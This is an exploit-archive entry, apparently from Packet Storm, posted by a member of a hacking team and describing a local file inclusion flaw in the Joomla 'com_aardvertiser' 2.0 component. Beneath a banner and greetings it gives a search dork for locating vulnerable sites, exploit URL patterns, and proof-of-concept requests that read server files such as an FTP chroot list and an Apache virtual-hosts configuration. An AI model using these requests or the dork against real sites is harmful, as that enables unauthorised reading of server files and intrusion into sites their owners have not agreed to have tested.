Joomla Advertising 2.0 Local File Inclusion

2010-05-14T00:00:00
ID PACKETSTORM:89510
Type packetstorm
Reporter eidelweiss
Modified 2010-05-14T00:00:00

Description

                                        
                                            `========================================================================  
Joomla Component advertising (com_aardvertiser) V2.0 Local File Inclusion Vulnerability  
========================================================================  
  
1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0  
0 _ __ __ __ 1  
1 /' \ __ /'__`\ /\ \__ /'__`\ 0  
0 /\_, \ ___ /\_\/\_\ \ \ ___\ \ ,_\/\ \/\ \ _ ___ 1  
1 \/_/\ \ /' _ `\ \/\ \/_/_\_<_ /'___\ \ \/\ \ \ \ \/\`'__\ 0  
0 \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/ 1  
1 \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\ 0  
0 \/_/\/_/\/_/\ \_\ \/___/ \/____/ \/__/ \/___/ \/_/ 1  
1 \ \____/ >> Exploit database separated by exploit 0  
0 \/___/ type (local, remote, DoS, etc.) 1  
1 1  
0 [+] Site : Inj3ct0r.com 0  
1 [+] Support e-mail : submit[at]inj3ct0r.com 1  
0 0  
1 ######################################## 1  
0 I'm eidelweiss member from Inj3ct0r Team 1  
1 ######################################## 0  
0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1  
  
Download: http://sourceforge.net/projects/aardvertiser/files/  
  
Author: eidelweiss  
Contact: eidelweiss[at]cyberservices.com  
Thank`s: r0073r & 0x1D (inj3ct0r) , JosS , exploit-db team , [D]eal [C]yber  
Greetz: all inj3ctor Team, yogyacarderlink Team, devilzc0de & all INDONESIAN HACKER`s  
  
========================================================================  
  
-=[Descripttion]=-  
  
A Joomla 1.5 component for advertising items in a 'classified ads' style on a Joomla site complete with extra modules and plugins for improved functionality.   
  
  
-=[Dork]=-  
  
inurl:/index.php?option=com_aardvertiser  
  
-=[Exploit]=-  
  
http://localhost/index.php?option=com_aardvertiser&cat_name=conf&task= [lfi]  
http://localhost/index.php?option=com_aardvertiser&task= [lfi]  
  
-=[LFI]=-  
  
/etc/vsftpd.chroot_list  
/usr/local/etc/apache/vhosts.conf  
  
-=[ P0C ]=-  
  
http://localhost/index.php?option=com_aardvertiser&cat_name=conf&task=/usr/local/etc/apache/vhosts.conf  
http://localhost/index.php?option=com_aardvertiser&task=/etc/vsftpd.chroot_list  
  
=========================| -=[ E0F ]=- |=================================  
`